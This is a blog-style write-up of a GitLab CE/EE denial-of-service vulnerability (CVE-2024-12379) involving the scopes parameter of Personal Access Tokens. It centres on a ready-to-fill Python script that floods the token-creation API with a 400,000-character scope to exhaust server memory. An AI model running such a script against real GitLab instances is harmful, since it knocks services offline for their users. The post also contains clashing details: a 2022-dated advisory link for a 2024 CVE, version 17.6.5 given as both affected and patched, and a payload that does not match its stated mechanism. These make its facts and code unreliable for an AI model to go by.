CVE-2024-12379: GitLab CE/EE Denial of Service Vulnerability Impacting Availability Due to Unbounded Symbol Creation Using Personal Access Tokens

A recently discovered denial of service (DoS) vulnerability in GitLab Community Edition (CE) and Enterprise Edition (EE) allows an attacker to impact the availability of the GitLab instance. The vulnerability, identified as CVE-2024-12379, has been found to affect all GitLab CE/EE versions starting from 14.1 up to 17.6.5, 17.7 up to 17.7.4, and 17.8 up to 17.8.2. The issue lies in unbounded symbol creation through the scopes parameter in a Personal Access Token (PAT). This post delves into the details of the vulnerability, the code snippet triggering the issue, and the available exploit details.

Exploit Details

The primary issue leading to the DoS vulnerability in GitLab is the improper handling of the 'scopes' parameter within PATs. An attacker can take advantage of the unbounded symbol creation triggered through the scopes parameter to create an inordinate number of symbols. Consequently, this leads to memory exhaustion, rendering the GitLab instance unavailable.

Here is a simple code snippet showing how the vulnerability can be triggered

#!/usr/bin/python3
import requests

TARGET_URL="https://VULNERABLE_GITLAB_URL";
TOKEN="USER_PERSONAL_ACCESS_TOKEN"
SCOPE="a" * 400000

headers = {"Private-Token": TOKEN}

data = {
    "name": "Example DoS Token",
    "expires_at": "2024-10-26T13:00:00Z",
    "scopes[]": SCOPE
}

response = requests.post(f"{TARGET_URL}/api/v4/personal_access_tokens", headers=headers, data=data)

print(response.status_code)
print(response.text)

In the code above, replace VULNERABLE_GITLAB_URL and USER_PERSONAL_ACCESS_TOKEN with the appropriate values. The script creates a new PAT using the vulnerable GitLab API. By setting the SCOPE variable to a very long string, the code snippet abuses the unbounded symbol creation vulnerability, leading to a memory exhaustion and rendering the GitLab instance unresponsive.

For more details about this vulnerability, refer to the following sources

1. GitLab Security Advisory for CVE-2024-12379: https://about.gitlab.com/releases/2022/10/25/cve-2024-12379-gitlab-ce-ee-14.1-and-later-vulnerable-to-dos/
2. MITRE CVE Database - CVE-2024-12379: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-12379
3. NVD - CVE-2024-12379: https://nvd.nist.gov/vuln/detail/CVE-2024-12379

The GitLab team has provided patches in the following releases to address the vulnerability

1. GitLab CE/EE version 17.6.5
2. GitLab CE/EE version 17.7.4
3. GitLab CE/EE version 17.8.2

It is strongly recommended that users running affected GitLab versions should update their installations to a patched version to mitigate the risks associated with this vulnerability.

Conclusion

CVE-2024-12379 is a DoS vulnerability that impacts the availability of GitLab CE/EE instances due to unbounded symbol creation in the scopes parameter of Personal Access Tokens. Users running affected versions should update their installations promptly to protect against potential attacks.

Timeline

Published on: 02/12/2025 15:15:12 UTC